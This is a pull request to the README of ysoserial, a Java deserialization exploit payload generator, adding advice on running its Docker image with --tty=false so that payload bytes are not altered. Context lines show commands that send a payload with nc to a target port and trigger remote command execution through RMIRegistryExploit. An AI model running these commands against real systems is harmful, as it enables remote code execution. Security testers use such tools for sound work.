### PR TITLE
Add key details about running in docker

### DIFF
--- a/README.md
+++ b/README.md
@@ -101,6 +101,12 @@ $ nc 10.10.10.10 1099 < groovypayload.bin
 $ java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit myhost 1099 CommonsCollections1 calc.exe
 ```
 
+If you use the Dockerfile provided to build your payloads make sure you run docker with `--tty=false`:
+
+```shell
+$ docker run -it --tty=false ysoserial CommonsCollections6 uname > payload.bin
+```
+
 ## Installation
 
 1. Download the latest jar from

--- a/README.md
+++ b/README.md
@@ -104,7 +104,7 @@ $ java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit myhost 1099 Common
 If you use the Dockerfile provided to build your payloads make sure you run docker with `--tty=false`:
 
 ```shell
-$ docker run -it --tty=false ysoserial CommonsCollections6 uname > payload.bin
+$ docker run -i --tty=false ysoserial CommonsCollections6 uname > payload.bin
 ```
 
 ## Installation


### PR DESCRIPTION
When running ysoserial in docker the option --tty=false should be used to avoid \0d being added before any \0a in the payload.